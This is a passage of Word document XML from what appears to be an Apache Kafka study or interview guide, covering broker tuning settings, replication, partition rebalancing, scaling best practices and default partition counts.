          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>log.retention.ms</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Set a retention policy based on time to manage disk usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C68D94D" w14:textId="77777777" w:rsidR="00866091" w:rsidRPr="00CE4B95" w:rsidRDefault="00866091">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="230"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>num.replica.fetchers</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Increase the number of fetchers for replica synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6556B5" w14:textId="77777777" w:rsidR="00866091" w:rsidRPr="00CE4B95" w:rsidRDefault="00866091">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="230"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>num.network.threads</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Increase network threads to handle more network requests simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BC41C9" w14:textId="77777777" w:rsidR="00866091" w:rsidRPr="00CE4B95" w:rsidRDefault="00866091">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="230"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>num.io.threads</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Increase I/O threads for better disk throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3834824E" w14:textId="77777777" w:rsidR="00866091" w:rsidRPr="00CE4B95" w:rsidRDefault="00866091">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="230"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>zookeeper.session.timeout.ms</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Tune for a larger cluster to handle coordination between brokers and Zookeeper.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5177AC59" w14:textId="77777777" w:rsidR="00866091" w:rsidRPr="00CE4B95" w:rsidRDefault="00866091">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="230"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Replication Factor &amp; Fault Tolerance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771BAD24"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t xml:space="preserve">Ensure that each topic has an appropriate </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>replication factor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (number of copies of data across brokers). A higher replication factor improves fault tolerance but also increases network and disk load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCE43F9"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t xml:space="preserve">Kafka allows you to configure </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>replication</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> per topic. For larger clusters, you might increase the replication factor to ensure high availability and minimize the risk of data loss during broker failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33129813" w14:textId="77777777" w:rsidR="00866091" w:rsidRPr="00CE4B95" w:rsidRDefault="00866091">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="230"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Use Partition Rebalancing Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B60EB0A"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t xml:space="preserve">As the number of brokers and partitions grows, partition distribution can become uneven. Kafka provides tools to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>rebalance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> partitions across brokers to ensure that the load is distributed effectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0025CC2F"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t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka Reassignment Tool</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be used to rebalance partitions across brokers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4516C9C4" w14:textId="77777777" w:rsidR="00866091" w:rsidRPr="00CE4B95" w:rsidRDefault="00866091" w:rsidP="00866091">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164741DE"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t>Generate a reassignment plan using the tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B6A575" w14:textId="77777777" w:rsidR="00866091" w:rsidRPr="00CE4B95" w:rsidRDefault="00866091">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="230"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Apply the reassignment plan to ensure partitions are evenly distributed across brokers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F6621A" w14:textId="77777777" w:rsidR="00866091" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00866091">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="45A2CEBC">
          <v:rect id="_x0000_i3074" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="721E6F29" w14:textId="77777777" w:rsidR="00866091" w:rsidRPr="00CE4B95" w:rsidRDefault="00866091" w:rsidP="00866091">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Best Practices for Scaling Kafka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149B716E" w14:textId="77777777" w:rsidR="00866091" w:rsidRPr="00CE4B95" w:rsidRDefault="00866091">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="231"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Monitor Cluster Health:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use Kafka's monitoring tools (JMX, Kafka Manager, Confluent Control Center, etc.) to track cluster health and performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5B546A" w14:textId="77777777" w:rsidR="00866091" w:rsidRPr="00CE4B95" w:rsidRDefault="00866091">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="231"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Avoid Too Many Partitions:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> While partitions scale horizontally, having too many partitions (e.g., thousands) can lead to operational overhead and disk space issues. Balance the partition count based on the workload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC23CFA" w14:textId="77777777" w:rsidR="00866091" w:rsidRPr="00CE4B95" w:rsidRDefault="00866091">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="231"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka Zookeeper Optimization:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> If you're using Zookeeper (older Kafka versions), optimize its setup for performance and reduce the number of Zookeeper nodes as the Kafka cluster grows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AA0DD4" w14:textId="77777777" w:rsidR="00866091" w:rsidRPr="00CE4B95" w:rsidRDefault="00866091">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="231"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Dedicated Hardware or Cloud Setup:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ensure that your hardware or cloud infrastructure can handle the I/O and storage requirements for Kafka, especially if you have large retention periods and high throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792EEC36" w14:textId="77777777" w:rsidR="00866091" w:rsidRPr="00CE4B95" w:rsidRDefault="00866091" w:rsidP="00866091">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1828CAC2" w14:textId="77777777" w:rsidR="00866091" w:rsidRPr="00CE4B95" w:rsidRDefault="00866091" w:rsidP="00866091">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka scales well horizontally by adding brokers, increasing partitions, and scaling producers and consumers. Configuring it for high throughput, fault tolerance, and replication while managing resource allocation ensures it can handle massive amounts of real-time data effectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF720C2" w14:textId="77777777" w:rsidR="00866091" w:rsidRPr="00CE4B95" w:rsidRDefault="00866091" w:rsidP="00866091">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>If you want m</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20561AD8" w14:textId="62800981" w:rsidR="00866091" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00866091">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="72592F7F">
          <v:rect id="_x0000_i3075" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AD6B5B" w14:textId="5073BA9A" w:rsidR="002D75F3" w:rsidRPr="00CE4B95" w:rsidRDefault="00C966F9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="763" w:name="_Toc196308243"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are the default partitions in kafka</w:t>
      </w:r>
      <w:r w:rsidR="002D75F3" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="763"/>
    </w:p>
    <w:p w14:paraId="47499B4E" w14:textId="63D12714" w:rsidR="0018081D" w:rsidRPr="00CE4B95" w:rsidRDefault="0018081D" w:rsidP="005A6248">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In Apache Kafka, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>default number of partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for a topic is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, unless specified otherwise when creating the topic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD7CB63" w14:textId="77777777" w:rsidR="0018081D" w:rsidRPr="00CE4B95" w:rsidRDefault="0018081D" w:rsidP="0018081D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Default Partition Behavior in Kafka:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA27CD2" w14:textId="77777777" w:rsidR="0018081D" w:rsidRPr="00CE4B95" w:rsidRDefault="0018081D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="232"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">When you create a new topic without explicitly specifying the number of partitions, Kafka will create it with a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>default number of partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> set by the broker's configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169B2E7A" w14:textId="77777777" w:rsidR="0018081D" w:rsidRPr="00CE4B95" w:rsidRDefault="0018081D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="232"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
